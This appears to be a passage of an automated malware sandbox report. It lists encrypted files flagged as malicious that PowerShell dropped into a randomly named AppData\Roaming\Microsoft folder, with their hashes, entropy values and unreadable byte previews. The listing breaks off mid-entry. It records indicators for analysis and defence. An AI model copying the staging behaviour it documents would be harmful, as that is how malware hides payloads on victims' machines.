                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):118614
                                                                                            Entropy (8bit):7.9985600743241125
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:b3Qw0joMXj3tY5kx89+lIowA1BaozuQelkWAgk2Eeb:b3QxMz5m/lUWBaodUk2Eeb
                                                                                            MD5:7F0056093FB606B600536E25F534707F
                                                                                            SHA1:EFAD0627E74D987BD6D9611872A7FDB999D9237D
                                                                                            SHA-256:88EEEB283AEE809BBD13D7DABB94A08243E72AE5978BD14159C74E6BA700551E
                                                                                            SHA-512:A636D6868937E0F8EA8E04C5A884AA6BDE241E4DE2E561B46A52ABD0621DC8F9D8CD7AE54B8A23EA6F624F1F39DE052BD2EB85978AA6193A7CBD5C9E873EA534
                                                                                            Malicious:true
                                                                                            Preview: .....5.=.}..o..6..s.x.6I.n....>.....3*....#...0.qy;:z~...f*M..P....n,...."...t.@.......d.j;.J4>.).....K.kJ.?.....lr....e.....O......4...%%..bd.i....}A:L.....7......=!...?..Q\....p..>W....r..w..Sq.X:E.....NRE......[F.......ux.?C..c.....MU25X.....Z....,..O|x9..G.*.'.F.phR^.G...d.Z../W.$..Y..#&.......S.jS]\...J.&Vk..|.....6:.6...w..S.ZW.C...o....?pR..../.&...^....4f$.b.L.e.|......5...*..{$)!rv....Kh..9..d....6.6s.;oI.."..T...P.1+t.1.....m5..@..........7*.+.f...k.B.u.S#..'D..D..7..}.|....'....6..>.'0.@)...r........%HD..A...u)..e\1..G.jS..&p'T/.....>g....R...Z;...H7.U._T....-...47.e..b..M3..5..Ypd....`2...../.".>.,.y8...!m .QYMK('....I^...Tn....DE-..........i6^...u.o..Xt..}...w... .=R.K?WL.>.....2...J`vDT..2.&\">..q..#F...Q... .D.7S.1..w.k.%.....3x..y.U.....]U.%.h..c2...fY.o....\.L........T..\...N.1.W...X."..>&.....Q.%Hh.d.......Gd|.......-i.................?.5G....l.h.6B.:*...zu......"......!j.....]....=.5l3>....5..F.H........_.. #.
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\bOGjhazSdBHTmZPLYvo.gYwXFeuJSZVbQN
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):117677
                                                                                            Entropy (8bit):7.998253010721276
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:eifB3JTg/4ebTwW5e/jxJsmw0ebJ4V1t2S+ipAbPb:dJs38JjxJsmw0el4hvM
                                                                                            MD5:A5B3CBCF135B14C223887524D170E715
                                                                                            SHA1:02A6850C52B5005541B62FC8A1CEBDF329BB6EA0
                                                                                            SHA-256:9902E84E7EC0AC0BF503844D9BBC609D43BF8C6EFA8128C7AB12F83195391F3A
                                                                                            SHA-512:747107CBD052C2AFC1CB818811A5D9C4B434AF4E82BB058F9FD73E47689166E2052CF9FFAD893729CE1D1E73DEA043AFDB7C7B2372AD2C86E73E37D3C46D58CE
                                                                                            Malicious:true
                                                                                            Preview: .[..@.g..(w..A.h..<0....R.w.m..Ql...f.t..*...G...<R..<#.2./..w....t..G.=.*......rs{...3.D....^..."....NH.tH.*D.-.-..6?.....3h.5.H...y.q..Y....o&^.1...^1+../...?D..7..?....I..,.t....>+l..N.icxy..#.8(..u9...PH......:.o..Ke>R(.c1.<..<._C.....b.iJ.j.H...m..E.".rp.@..C~(u...P..._......{.Vm....l..&.!...*B...bd.....C...p6.. Z.?...9.g..U.+......4.Qdhu.\..18!.....+~..:W .3sB.%.&..<k~j.Q...B.i6.E.>7).U.).ce..........nK..c.K..G.!p..~+..A..i....+~.m<)......]..W.2.={.mV.u~....T^..V..Y..r.#5c..K..&.^l.CN......}.D...9...?...:....z.m.L.y.y..6.C..J.........2dp...R......9w..Y.u.U..Y...dI.U...Q.eh..@......u..4~.d...:......Z..$%.Q.$...bWIu..Q..~.r.+.<&..6>.3.P.DY..E}u...".nM.Qm...&..n..,..ACF..f~....x;.z..]......4q..GQ\..~.....4.].^.Bmj..C^d|...,2...x..y..&......'........\T.4...-...BqEqC..A..~..m.@.Z.....;.?.M.h.B.W"..h..V..(jX.t..-..%U.5Q....f.U..v.u../........../=1..]....m&G.cB..y...`..!.......%...."..Xh.@$...T..J...C<N...QTz..].]b..V..]A.Cz"....I..?...2.....
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\bkcEOMPgNlCfo.hHZWmwSbiN
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):76809
                                                                                            Entropy (8bit):7.9976309842610815
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:3ejYkQLw33j8EZ4WgL5+Da/v2ffa9m7sJti:3G8yZ4Qe/v2n0m7sHi
                                                                                            MD5:5879B85CFD661E01A386691569E40DCD
                                                                                            SHA1:4B7879FC285A02E5C99CEC1D5FC4DBB4E2B1537C
                                                                                            SHA-256:B8F04FE629A206F03B1B9C47086371A6EB44E8374473650EBC8A81363804D0A4
                                                                                            SHA-512:80EE9B40FD20A71065467FA51681CBAFF1048D3D7E80CFFC6D134D9C6BA48327BFDE75F46257E2BCE66989CFB6E362AE401532AC1C004CCCD88EE31606AAA43E
                                                                                            Malicious:true
                                                                                            Preview: .b.S...2.(.e./My|.afE..K.'"Y.W.....+.@......0OZ.}...uy.{..q....uZ.P. .)..7.........7.}&jdb.v...6....I_.!v.UB......L..\....zo:.....u-(...'.w.X`zf...F}#Wb..y...Y...\>b#..O..n.eG7.P..{.H..Dk.yA..1F..'...--m....1.~.}r....+..5..t.P.......bMm....9p..^.........X...&`.r.....GcS.#.......m...P.Q.s-{.d..i...Yi....f}0.....a.O..iR.&...a.q ..9..Z.....xC1{.q...Y.n....]+.....DlY....Xp.~....D.....$I....1k3.....%.?.p<.H...bI<G..";....Mny.....z...?..0Z0H......Y&r..#.j.A.....s.7Of..]F..e.Y?V>. ]R.G..Q...p.X+e;.^2^N..i.]h.8.X....1Z..l.k...?m9*.......>.jXzvf.)..K.4....H..8.../...`.@<..V)..s..P"..=..Ec.....hJ.M..I...@4......L....FH.M............fq.._~.....p.....GS...,.&.......%..#<`o..'..FGf..Q=ac.sE.......p.*......,.._7*.j.ojm.8Q.._/Hu...$.V~.....Y.~.t.a-.4.t3>T=.56.s....%...xNGO..0..i{...)..$b...4.L..;.=n!&..m\........r.!....r}.....-..!..(.+.ux...P-G.?b1...zq.Y.=.. ..{ZI?..,..Xab....cT..1.../.:HW..M.tc.l(.n.".X.8.>.,.n..).>".hbi.f....(:.T ...O.
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\cPmAHLlBJEfYonRFqTd.mbFdJIQypO
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):176427
                                                                                            Entropy (8bit):7.998960272659409
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:iQOMWorHimp55VOgSEO6AuQd6USuAXYQlgZu+WdpByLZYGpSr:NwwHzOvuQwEAXFdjyL+Pr
                                                                                            MD5:C6A7BB37E82D9BA330FF571407EC26FB
                                                                                            SHA1:C5594416BAC79FF6D6A2105F64C71A8E23974043
                                                                                            SHA-256:03D999655FA4CC1FBCE2889C6CB89B30765C5AB72723D8BE9585D2971739AC2B
                                                                                            SHA-512:399CD8A55337FB44F560C7639F133E3549F7EFA0AD0A671988E55D2DAE6E5DA531F5FA505D4B516DE63925EED66F4E8F932E5EAF5D3562207B3701F83EC67FE2
                                                                                            Malicious:true
                                                                                            Preview: .....0\1...\$...d.h...:\...6..l....TJ!T.....R....o...H..e..h.{.84.T<nB..8...B.)7%=.....Qnv.& o.$....K.n....*9....C...>......kj./..`.%.P.....U'5..!.,.p..y8H.wOq...1b1=....C.v...J. .....HW..e.....B.80..`..lnd.'.ae..u1.... ......_...c..=\o+7....giM,=.P...............v.i....Be<.>..!E...EL.....1..h.i.~.$.J..K,F.....h+(0..?....V..AK...|+}.0.}..5.".?..@......<.o./....9.0<....@..~L|..........TA...N.l...&.../.z.8.X...1....h..l.?u..g.a.s.;7....v.QU.../.1.Xn.g....g....b..t.@.[.*...UF..;/...a.D.:w.|.D.Y'..\.&hD.LQ,....C^.F:....z!wdoW.......Vs.j..;..9eEA....`....~.._.Q.dH...!!....5.9....~u..v........1.:r.]{..,%I....9....-.m,..,...`.....1.q.Q.........I...F_TNp$>.....s.-..af<....I.J#.p....`}...W..[p...O....TM.....x....2..-`..R...^.+.0b.f`..)....<.J......_...^........&....`~@...t..k.@..........;...3..\ISf.aF.....:.n.........v....@>....3. .......s....%lfPdx.B...Rn.+...0t..Y..)...:S..f.l..Z4.....j.~'.*.>.kN:.C...x..9.....?x,.CR.....m.v....M......@.c...A
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\cbwhGoKafEsNdO.hkbPgXmfDFuzyoR
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):92506
                                                                                            Entropy (8bit):7.99822357567078
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:qQCDTBaX1pm74bmIWsDmo5jSJiNVE8smvm6WPeu9kVKQ414KF4eZ3ZSU:qNnBaX19yqZjSJX8sGOPeFVi14KF4MX
                                                                                            MD5:B462C46CC181EB6A2F7653106F2E2C0D
                                                                                            SHA1:2349B594B366C382BA299B9BF520EA81FF955C33
                                                                                            SHA-256:6953519748AEE4AE3AE26B6F252462D561755803CE36594C906ED8CF779CDB75
                                                                                            SHA-512:B28141295A42E48B3143AD486BABA59F4B5A7155AAA8FC28F0EBA4AF6D07E576E9C1F15A03D9288705381952032C4DA06AA801F379C72C537451956C80091CD3
                                                                                            Malicious:true
                                                                                            Preview: /H..%...tH.$ ....=.. .....q.....,.Tg^.>-`...G.N.....2...q)*.{.#4....c..P..V;..U.or.X..Dz....f..mg.`..&-.G*........W.......?<.....,$9.ID~.Td...*4?G.^.|s_.g<W........>...........C.3.H...&..'....\j.........Q..vK.Z.}.j......i.....51WY:..........[.~L.....5.e...>.E.. 5.S...8..z..y.m4.svG..W...J..K.G:R.....^m..02o.|].<...T.,..A/..d&.t....%.].n..(.f.a......d,.0..I..F..p.~.|...M...@v.vRwL......P..$.....p1....o..B.7..W....am..,H..U.6...D..ze....`vIQ...8...T..U...2.[6....v..q.C..G.ENS<.......=..1.....gF.v..j....ey........W=4.......]...-....7.. .v.>bm./...8]m..._.....<..f1.X...p%.[T2..m..... .*6Q........f..~no..H...-....G...FV.!....V8Y|kP.].....;..$<}.6.LB. .Z]...$.g9...kP.+..Pm....r.....:./..3nWY...^\c.../c..p..;..MbV.+..SzL.Eb..F.:9..$.F^.9|d.l]..8..2hLf.\Z.i#.+F{..V1.w.?....g`;l.t/...Qu.....P.K..u..0.e(o....E..%....C.iL..R..9....C.(.}...Z..d..^&.1....y....jjh.t...m..x.}......aA..._./a.iS8.^..#...,..$:J{......(....)...$p...-.nBJ..>.$~..3........o6
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\dbhYTxgcwOknlfLPy.dXWZOzuyEncBiKgphl
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):157693
                                                                                            Entropy (8bit):7.998859298873824
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:AIsWjF/bh4zeY18Lf62LfYyOBjhTRxHy4kKswhWE/XVHTAud5Zz3T:TFF/VeeQ8LfrLbMjZ3SusEXdTDZz3T
                                                                                            MD5:7FC45F02CB69A61168257C0BEC1A7FF9
                                                                                            SHA1:92B99BEDA8D047B38ACD003F7E8266453A2C10A1
                                                                                            SHA-256:8C6C42BDE05D6D3ADD4BAB54C498A9988A1317C51D00C7FBC83AD25F268CDDF4
                                                                                            SHA-512:9A08400EC99C3EF6C522A35E843D97ABC8B2BA2DF7B80F5FE044334315917FDCF9F020420379369D01D448AEA10A09C85B40481D2C65FC0B8BA609305FF28BE7
                                                                                            Malicious:true
                                                                                            Preview: ..."`.rb.u.B....R...>.Y.....X...g."E..l..eq.....q...........O`..v...>.\|+...............BDE..)... ...R3..w~[......i].g.o.B.......q..+..k.?*.Zu\..E........:...|.Iv..q.0.q..yD..$....#.%".f.yV...i....&..B..p:.'.qL$..%...z.=."............0.r~}..B....T.....'..._.#..a...D...S..z5.6.BW.C....@.T&..zY......H.!...{>......tt.V..../s.@..o..(..."#~#...~R....-.<.)....K.....>...Q..\... .J....s..XP?tx2..2..Z1QEe.......|...e.cBLU.O...c..ym.}..._I.RO..1w.;.@.N...g....00.....|c\.`.}...brC.'.....+s..<."l...{c...4...r...h.o...:`.8...... .S.AO.0..<........TT...h...V..\Q.I.'.`.t...n~(...]%D..m..G.U....g..<..Rl..l.!...KT...W..N..[..r.?....^......@...qH7...K.$].9..7u\....P...?.HU.p|p..8;_)4:*p...+...#..!![n..I..L.K...:....~....xmqE.L..n....Q.8.$.x.F......Apj.^.RX.S...!m4?....1T.p..J4.Jlb....?.s%.5..g.S......h,...K...F;...K....de.....Zf.-...I..\...;.V.\/.....3y./.......1v.9.SOQn.H..l.+_.&.............. ......'[0.!X6-.!.\%G@~......P...6..mT.D.ukcU..[...T_....H..M
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\ftehrgjdHTqRZ.cdQmyTfGIkCYzh
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):97622
                                                                                            Entropy (8bit):7.998299352240902
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:wdC4kP2SxZNqADIzc1JC1ApiWCi7LoSJQ1ZuR7OU+xtt0NZeRJ//VxucwOQZB:kC4kFvBzCiv5HO5t0NZEVMlZZB
                                                                                            MD5:2BC9D4F084699EE3B064621A7CB052CC
                                                                                            SHA1:848AA9F7898BEA76E03AF7542D3170351452C6E5
                                                                                            SHA-256:1207BDABF55B4C3F6DF4D917CA3B39E2A4BF68CD8AC20D19067152DEB300E443
                                                                                            SHA-512:6B63B833B3710659C38ED47539107FA483A739709E1884A63DA898FD2EEB4E3BA3D8919FBDD1164F0BB116CF8A5C63B1085D6F1181D5229422E7020F50D23A59
                                                                                            Malicious:true
                                                                                            Preview: ..@....Kp....U.n.PW....i..>(....."Q......p..3..W.7.T.w37T..".........Oa.;.....?.L...iA&...nn......G.:..ir.P_.Gx.$..ap......dM..E.R.....t..[V.`.&.n......6....%...nmO.m[.ia.5.:.3.V....LAA......<...@..~.YAn.e.j..FK..",....B.f...{.....T;).....S..Lc..6....m....u.}.....g.._.YN.JE{....E../.pt.]/]7&^..>r..S..y%..=P...l:............T.)=....n($....z.m|..#...h.y...cpe....Gt....^@.Q.z._.0...?..5.XfQ;Q.f.S5B.W.<....6.U>.t4..p..z2Zv.#...&J......4....(M...`.x.a.%.....,J./..[.3z.."|xWNO\..q..b.=..N.....4fC..,..>..Wx.....s.,+ ..(.W........^b.'|N..&....aP.;".J.z{..J..^.q..a......m...B4....CY._p....4OR...P...Qwmo....v.L*{...(G....`.@.B.. .....x...5v.$..>.'an......4..=..z..M../@oRy.i.S..).t!.1....$Y_c....Uj..|BcR..=.8{....Db........hN.N....I.D.....Ty..L.%w.jqZSc...9-.R.....mhD...u.Y..a(x.....{}..(..8'..vA.%.+%SQ.....#...O..P.]....kY.N3r.H..o.23^.x!.......%.e.z.......J..8.3w?.....m.....wr...8`.T.J;I...*..a_.........XI&'_..F..?#.....d........w....q...#.F0d..!<
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\gEGPTCzXcJpLbsW.aGOncoiTpkShXyWN
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):56447
                                                                                            Entropy (8bit):7.996763641809161
                                                                                            Encrypted:true
                                                                                            SSDEEP:768:8bKLmXb23tP2R5JYtMncTRYBOeqwIh9UaSYIrYoIeONod5Mro600ioSQeJLK0kMP:jqXQtP2TnrBmRUuoIeazrf0R79GSuW
                                                                                            MD5:8E34DC88143FD46A78429538BC8E558F
                                                                                            SHA1:72297C49F1DD0290E081DBD14B8023BFEBCC82B4
                                                                                            SHA-256:78C0886F109D432DFE6391CD6124062E0384A8DA280C7CF3FC9CC87D3D22E9E6
                                                                                            SHA-512:E97380E674F86F9CBF1B80CA99AD3CC17659457947828238FB4AFF2685BB1B6E6E56AD075CE6D2F8D149A86019E538C32A41CA384A9171FAC690D44ADA23C0DD
                                                                                            Malicious:true
                                                                                            Preview: ...\..#..A+.=.@......y..Lt'...X...BNW$.rP..Q....F>.e.~A.ji.(2}.#G..Vu..aj.CE{^.X.;.%xt`...v(.D}g.....x'...EF..`.B.......@.9.....E.h..z.[......XT..h...^..8..J..i..Tf..f.s...&K...8.'t5.....A.wS.......?6hH..N.Y....#X...8\..$...c....@......./....uB~.%....Y.VL..=.......g......c|4.U.h...[.9....~...c..@<#.~....!....X....V.3=.c!D..$"..'.\-8g'BI..I...Q...........^=..."..^...O..?.e._xph.-v.^o.wb....`.4'W.uU=.]s.yi...Z..+...M=..P......0..{........5.La:.05........X..u.aO........trG...`...A*...EA..ure[..\.n...!.v,D..#....$..!.........?.#.n.69.fF....Q..j..4.:;.s.Q...x_.E..)...N..k>MJ>..a......-.....}Q....{._.l....L.x.....'...r ..h..E..2...$..a..(.f.8..p..y6>.......!E5.y...Z. .p.D...(.x!2..Jn..V.Q..iXy.Zc.wYS..D.<Cf..#...DT...A.....T..;.k...|.Ee.....f`.e.Vl.6.K..j..)....H;.......>.(sHy......2;.~.p2pR....$.3.Q.......mu.......5S.7.M7"U$...W..../..........Z..h..V.......^:.1..~......<.Np......'.uo..C<..Ie....;.0..$..qD..~...=/.<.......-ol...g..n..P..$....]
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\gPuVCxOZRGK.ClFrGdavymeOAWxn
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):58868
                                                                                            Entropy (8bit):7.996992474061312
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:1cZArw4AO8og4/g920yr3rzQNGI0MXnlImPifmifMJrPr3:WArwa8otyyjrzQYQXnlImPtKMxz3
                                                                                            MD5:CF76CEBFE6D1BA7F05B518E0F3607F20
                                                                                            SHA1:F108D1814AAD75B9677FE6EE989AC56FBBF1CF9C
                                                                                            SHA-256:239D3570BD111477118BEB5333CEE8DF02B56E4A692321BE076D44176052AE8C
                                                                                            SHA-512:98575CD039DD86309A8BBEF0D8E98927BA106A3E9C80DFCE46EB32C0409F1E1B373CB4A0216930576CD0114F3026B59F9EEA0F906E705484086AAB19F59E2907
                                                                                            Malicious:true
                                                                                            Preview: .a..up.....'..b.{..r.3._..N..(.g.P..D._...gw..x\(.*..uC-..eV.$2.!ny@.LY......3....^7.Rl./.=...UJb7K.B...Pa..1.......A3.....<.:[.h.....ql..S..R..1U8:!.........t.`M....3..w...0\.... .d.../Pa..{s...l.....K..o..g........O...=-.R...+..d...d.\:._......q...!^..kV.;.....M...r?..F....2.}BG'.%F...>...!........'....K.+E.\......13.L.$0........~.Vn.8..+....'....%rw..)._..B.&...(V..nu @h.....$[..,$i.-.*f..>[....U-...Q6..(-.....4....~S.C...)o....-.L......ZP-.O&..D@..!a.>...1e.W....B...ON....I..j}.S..3.G9'.);...^>.+.=...x.X.V+....e...>e.|%...{.V..@...sPDf.......JB..2t......+.K...<......9..(...0....K.Z.2.;a..z....@...4:.:..x."...aC.....E..:.#.......k.}.J....d..._..-..U.qb.8..X.(.sK..<tbe..^.s8N.&h..`6.....F^.`..V.hn.ze.*..O..[....[.=.......qO......67..3?.\}.pV..Q..k.#......EV..Xv..........%sYJ....S.&.'m.W8.lW<3J..........^V.u`...c../.b.gQ]...@.}....dy..@....<.77.k.z9..H.ze..G=.h......}CT..!.i.p..7}.D.1ZcKA.?`9.N....67.%.....N...Q....s.1.cXjUM[P.....E.. w
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\gvXqMJDhSkw.kZCiLuxnrPHTsJM
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):188038
                                                                                            Entropy (8bit):7.998846542579685
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:FtOrhZxrzMT9M2NRRJwc57fCDkfoSC1J6HlkogxF73XRrx56In:fOrJrzMTbn57KD2ox1J6Hlb0LRNzn
                                                                                            MD5:5ACA4DC46FFAF9E9C88F04FC1FBD98FC
                                                                                            SHA1:B1A56E7084C099C4A8CC68C0476D59BC776BA246
                                                                                            SHA-256:0C909E262711F057BB7AACCC4757032D7FED0875EA12FDEC0745E947C6778620
                                                                                            SHA-512:B70242BA5AED75AD819411ECB165BFE6F0A3A80DD1540443A7C3C5DFA5F8E163A8FBE7B1F13281AEB8E66E249D6CB654B04935ED4FF8551156B5C93DCA47A885
                                                                                            Malicious:true
                                                                                            Preview: ..;.<qyA......Av..h....,.dYP...G...x.5.@[^J.s....G.qK..T. . .u.....Cz....tX3.v..sv.s;...r.(rO.t<(.._.b...7wH.z.v.,..4&.b$q._N......n8.y..F...!.jpu..X.<.:...X.pV.c.fc~][.L...OP.......\..h.b...q......?..[7.c.Mb.._......B.....Q..6)..zV...x$`..}...).....q.E!#R..#t.c...$....I|.Y.'..$$.z..G..&?v1.Z... V....QId.7.A..sd....a;bd.Y)"^.|..868.)\D.Y..e..\....w..z..:.....:..yb...o."C.n.X..Hh..@V.k.... ....Qds.^n..XdT....m$x..]....m.Wj../..3..S.U...=....].....k}.{....<.yc...%./_....d.......*...n.Y.#.QI...........[H..C...f83.....a.......c.).<~..b...F..:..m......3.2.V.B.)._T..K..k.j.WJ..P.z...1K.}0....T...c8.....{..B..q:X(...#.....Y..#.n... .p....:H.J.+...@..*...N..y..7L...m..d......OC...X......w..t...[...}....M~)D.)@.....I*....cj....p..1......*.3..3..8C)9...r.h...n5.'w.J..9.C.._.En6...GS.(...v.H.n_.}$..5.4.%wL...o......w.Np(......x...|....]...0|...%....=St.HK.w.[!..]"d..yv.5.s.FJS......)E.\.cc.T.!s?.Z1.X`i.........T{K...._...9%J.......Mb..tD~Z...
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\gzTuApnUWZRGdXFSYr.LCFTiNwmPDcq
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Dyalog APL version 97.39
                                                                                            Category:dropped
                                                                                            Size (bytes):184414
                                                                                            Entropy (8bit):7.999008241877673
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:G/Gv1LQunCUUcmO8ihnGMG3jH55mBBNtGcONSCQaHvFc54irhYw8nA:GONLQunCjc18F3jH5ODGmUHvu5fYw6A
                                                                                            MD5:CF17064F0A92FDBB8E4532FD4FC3BC38
                                                                                            SHA1:4A2FDE48DC2CE9A291DD4237CB8744302EEF2B15
                                                                                            SHA-256:6B5DAF97155DFFFB05E1F408D59D3FE4ABC894232D7974806CCEC5F119F96899
                                                                                            SHA-512:E8FF1463F010164F788557636A9C58E785E9444F3914DAD97D2A6E96C3508546D4A31AE1D1171F6B3DF1758F735FE8415960240ADEF7A1ACB1C6745AEFC7797A
                                                                                            Malicious:true
                                                                                            Preview: ..a'.... .3<.U..f....$q.zM\........H."....<... ..DB.Q=..:i.B]..K(6.z..8/.M...Nlr.]l...o[]F.U@......G.......@g...Jg....9.L.....<.S.$..s..T..H..@oc.MKt....J.&...H.....>......./.B....|n.k.DR(.v{w.....Qk%..A.dT.....Y. ..3)....:>...9Q....-!...e."..3}..x.9..&g..Q1EJD...#.-$-t...@..Z[.hN.Q~..[......Zg`...b~..3.k.':.=.X..T.ltC.wL(`.;?.A..w.91.q2S4{...g.]..&.w....,0MN.IhW...#d.A...G`Dx:..bc.'..p.JD..._....z+. ..5...k.../..Q...?.y..~.-F..7...f....[...t.Ih`u.....4...%.....c7a!^&1PE..F.}/.m..b./E.1..Et.='.....F.O^K9.<.(D.'F&.O.3.e.X..P.=.mi.&.s...@.D...La.<.|..WM.ro....G./...xK.=...0.@.<9S.d....9|.HZ...;.}:Bw.n.."..(1._{Y,.G..Oe....$.....U......r.#.T_h...hXk.......K.'.n.f...&V'.+H.Z#.........a.5ui..H..V.Q1..... Z...s.Y.._.... .a.R_iES..]k.#.?...c...k.a.5K....*v..~,....kD.%\..&l..o.X.q.......n....^i.L2...%...7.!5.Q.[`...].R'..v......<...Kl..p5...-....X.....n.T.^..`...Vo".b..+*..j\T#'{..n,..R.%...~..W.-4.e.z.V..7.y....K.h.X..r=..N..b.t'.o......H.......
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\hHgsQfEaVJSxXibp.mQlHnMaSPoKN
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):144687
                                                                                            Entropy (8bit):7.998692940576115
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:EtWRZQg74i3isPdxOZWAhCj7Flp962T5dUqf6b/oyZjgR09JY:8KqgriaiWAwvFlp99OqSAmjY092
                                                                                            MD5:A4D3099BB642672C6274B5EBA0989967
                                                                                            SHA1:E58BB81E296651228962917B8150D8F9D340848C
                                                                                            SHA-256:05E13D8D3C9BD8A2F1C9DA49527A56CFBEE8A15A019ADF99CBA68D26C14314E8
                                                                                            SHA-512:5FD27CD55592B095FDAB64A20EC866D3D5B6BDC8626C879845654948785B8BEAA1C8A5189A42801E38B97894450567CFC7FCE74F7EC7FA9227B38DAE3523D94E
                                                                                            Malicious:true
                                                                                            Preview: .......@.....t..S.K.nG....O.i...ms|B.T.i......+..50.h]K...)ws.}5. .LB.x..LxhM...#".4..i.(..+b..`....h.9....S.METP+I...$fu..Vr..../D..wf.L+E..G......*....].n..q.`}...8..pj.......j.r........i.F.....E....$.<.H........36...u.............bnPs.~.P.+x/......f5.is.o.@.F.".J...n1..7..+t..V.(.G^......>(.)..._@.\d.o\..y..x.......j4..,.....X.p....0gq2..........h...x.....kNN....npZ.`. ...W|......{ W...C..H....V.Q...Y....Qr.u_........e.Y...Z%...../"...w..P..p|..p..t.....!.LQ.h......Z"......mg...W"....vc.0m...........9T...L.{.a..C..x....n.3.n.J....x,..<...)..,..4l.Moe.ZPb. ~....uI...I9..qZ.iU(.9Jq..T.....".o'...k."...._.8.c....!.....Io...2^.r...(.........$3........pUQ..^....:<>../.b.....K..u..(....|...3O........h....]..e/.1..k9io.B....T.#a....]X.b..Y.gK.../..L.....ka.t...Bl..p.V.]..e.s......./.N=.j..p..H........6..X......[f<0O3+)....<..."5.....X.r......t....W.I.;.4&.J...C..N...G..F/.N..,0v......=.8..._.0B.=....L.s...Z.......X..x..W.0.....l.
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\hTUVAtmiEMuF.YbrcRuktOoLFJP
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):114052
                                                                                            Entropy (8bit):7.9982360868084
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:Of1vQTfpQoeOB61EsIU68A+ODBjvhx148/i7W07n:yaTfpQoCEwA+4B/b8r
                                                                                            MD5:2B2AC2F354B1032DE598BAFEF93B5883
                                                                                            SHA1:DE5332CCD99CA09122295237F427A64E9A26ACED
                                                                                            SHA-256:CAAAE929042197FFD883B8C10BD6EB48F1233294B113A524CA23F35B0ED4326A
                                                                                            SHA-512:1AA17324D01BC409BA14422677529A2D20788E4E4EB154DC3E415AFC913CEEA18B9203EFB95A49E58FCD6E590553AE040A1EFC688C94587733956BB3D88F2F27
                                                                                            Malicious:true
                                                                                            Preview: r.<.ipi..}...~..\o'b.w..>........dx.-#....%.,..]Et.YJGENk.*^.i.oW.8..z9x(.=R<sT.m.R.A...*b]...U..i]G.W`.K.!....\......+....@.IM.......nXG`.,.-3.".-...S2t~|.....V._ZF..-W......O..........{<_....Xk...B...|.........b1....YU..n.wa.....[.$...PM...4.X'.....H....._%.2.1...g.8.!.....y.............Z+..Ta..Q..VY..@sA2F.W..7.2|_2..^...JZhy.s..6..N.X`..P..)......$.........)..\.........[.9!.K......e.bG.+.&b...I.L.W,R%..A.m.\..B......a..4a=T....-J...?......X..........:...X.j...D.d)?......k.....873...F.|a...SB.........<..N..].{.2..6Lz.....L...pe.6...NM.$....X1. ..b|......c.Y..I..Df....9V&......g.2..1.c.s.{.P.y.d.0...yC9ay.B+...;.....9......K...IA...M.#BH,..Y>..V-.!.z....?...]'jl.j.H.wD..$.9BG..cW.(...H...h):.1.......a.Q...5..bB.K..........U.".UD9K.s.Kop..3.4O...DS...F>.w.IEG.aI.). ..7....T....K...@?..vEL%+...@r&....mfR{...N0....z...H..r....B.!b.&da......2.(...=.MMn1{.P.g......|...h.....@....PK..g.2...2..8..lu.K@.KB.D}.R%../z..I2.`..o.....*.k..~.$..h3I.[
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\iHJKhyYvFeCVZk.uXIYCDmqFBMdlQiwv
